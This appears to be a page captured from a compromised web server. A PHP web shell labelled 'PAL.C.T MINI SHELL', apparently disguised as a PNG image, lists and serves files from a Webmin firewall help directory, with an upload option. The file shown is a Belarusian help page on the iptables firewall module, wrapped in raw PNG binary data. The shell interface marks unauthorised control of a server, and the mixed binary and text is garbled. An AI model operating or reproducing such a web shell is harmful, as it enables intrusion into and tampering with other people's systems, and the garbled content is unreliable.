php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall/help/
upload
files >> //usr/libexec/webmin/firewall/help/intro.be.auto.html

<header> Брандмаўэр Linux </header><h3> Увядзенне модуля </h3> Гэты модуль дазваляе наладзіць функцыі брандмаўэра IPtables, знойдзеныя ў серыях 2.4 ядраў Linux. У адрозненне ад некаторых іншых праграм канфігурацыі брандмаўэра, замест стварэння сцэнарыя абалонкі, які ўстанаўлівае брандмаўэр, ён счытвае і рэдагуе файл захавання ў фармаце, прачытаным і запісаным <tt>ipi (6) табліцамі аднаўлення</tt> і <tt>ipi (6)</tt> . <p> Калі ў вас ужо ёсць брандмаўэр у вашай сістэме, які быў усталяваны ўручную альбо з файла сцэнарыя, модуль прапануе пераўтварыць яго ў файл захавання IPtables для вас, а таксама стварыць сцэнар для запуску падчас загрузкі, каб актываваць правілы ў файл. Аднак, калі вы зробіце гэта, то вы больш не павінны рэдагаваць сцэнарый правілаў брандмаўэра, а таксама забараняйце яго працаваць падчас загрузкі. <p><h3> Агляд IPtables </h3> Кожны сеткавы пакет, які ўваходзіць, выходзіць альбо накіроўваецца вашай сістэмай, правяраецца адно ці некалькі ланцужкоў, каб вызначыць, што з ім будзе адбывацца. Кожны ланцужок змяшчае нуль і больш правілаў, кожнае з якіх мае ўмову (каб вызначыць, якім пакетам ён адпавядае) і дзеянне (кантраляваць тое, што адбываецца з гэтымі адпаведнымі пакетамі). Кожная ланцужок таксама мае дзеянне па змаўчанні, якое кантралюе тое, што адбываецца з пакетамі, якія не адпавядаюць ніякім правілам. <p> Кожная ланцужок з&#39;яўляецца часткай табліцы, якой у цяперашні час тры: <ul><li> <b>Фільтрацыя пакетаў ( <tt>фільтр</tt> )</b> <br> Ланцужкі ў гэтай табліцы могуць выкарыстоўвацца для кіравання дадзенымі, якія паступаюць у вашу сістэму ад іншых хастоў у сетцы, дадзенымі, якія адсылаюць карыстальнікі і працэсы з вашай сістэмы, і дадзенымі, якія перадаюцца вашай сістэмай, калі яна дзейнічае як маршрутызатар. <p><li> <b>Пераклад сеткавага адраса ( <tt>nat</tt> )</b> <br> Гэтая табліца можа быць выкарыстана для наладкі NAT або маскіравання, што карысна, калі вы хочаце даць цэлай сетцы машын доступ да Інтэрнэту толькі праз адзін рэальны IP-адрас. <p><li> <b>Змена пакета ( <tt>mangle</tt> )</b> <br> Гэтая табліца прызначана для мадыфікацыі пакетаў, адпраўленых або адпраўленых з вашай сістэмы. <p></ul> У дадатак да стандартных ланцужкоў, якія ўваходзяць у склад кожнай табліцы, вы таксама можаце стварыць свае ўласныя ланцужкі, якія могуць кіравацца правіламі ў ланцужках убудавання. Гэта можа быць карысна для групоўкі і сумеснага выкарыстання правілаў, якія могуць выкарыстоўвацца ў некалькіх месцах. <p><h3> Галоўная старонка </h3> На галоўнай старонцы гэтага модуля прыведзены ўсе ланцужкі і правілы з адной з даступных табліц, выбраных са спісу ўверсе злева. Ніжэй прыведзены раздзел для кожнай ланцужкі ў бягучай табліцы, з усімі пералічанымі правіламі ў кожнай ланцужку і іх умовамі, апісанымі з улікам магчымасцей модуля. Для кожнай ланцужкі вы можаце змяніць дзеянні па змаўчанні, выкарыстоўваючы выпадальны спіс, калі ланцужок з&#39;яўляецца адным з убудаваных для табліцы, альбо выдаліць яго кнопкай &quot;Выдаліць ланцужок&quot;, калі яна вызначана карыстальнікам. <p> Вы можаце націснуць любое правіла ў ланцужку, каб адрэдагаваць яго, націснуць стрэлкі справа ад кожнага радка, каб перамясціць яго ўверх ці ўніз, альбо націснуць кнопку Дадаць правіла, каб дадаць новае. Даданне або рэдагаванне правіла прывядзе вас да старонкі, на якой вы можаце выбраць дзеянне для кожнага правіла, і ўмовы, на якія выконваецца дзеянне. <p> Унізе старонкі размешчана кнопка для актыўнай актыўнай канфігурацыі брандмаўэра, загружаючы яе ў ядро з дапамогай каманды <tt>ipi (6) табліц аднаўлення</tt> . Унізе знаходзіцца кнопка для адваротнага - прыняць канфігурацыю, якая знаходзіцца ў ядры, і зрабіць яе даступнай для рэдагавання. І, нарэшце, калі ваш дыстрыбутыў падтрымлівае яго, ёсць кнопка, каб змяніць, ці ўключаецца брандмаўэр падчас загрузкі. <p><h3> Ланцужкі фільтрацыі </h3> Для лепшага супрацоўніцтва са знешнімі сцэнарамі iptables вы можаце выключыць асобныя ланцужкі з апрацоўкі брандмаўэрам. Для гэтага неабходна выбраць прамую апрацоўку правілаў у наладах і ўвесці спіс фільтраў, што выключае адпаведныя ланцужкі з апрацоўкі. Ланцужкі, якія не адхілены ад рэдагавання, пазначаюцца паведамленнем &quot;не кіруецца брандмаўэрам&quot;. <p><h3> Наборы IP </h3> Новыя версіі табліцы ip (6) падтрымліваюць пашырэнне ipset. IP-наборы - гэта спісы IP-адрасоў асноўнай памяці, якія можна шукаць вельмі эфектыўна і выкарыстоўваць як умовы ў правілах. На галоўнай старонцы адлюстроўваюцца існуючыя наборы IP, якія могуць быць выкарыстаны правіламі. Аднак у цяперашні час немагчыма кіраваць імі ў міжсеткавым экране. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`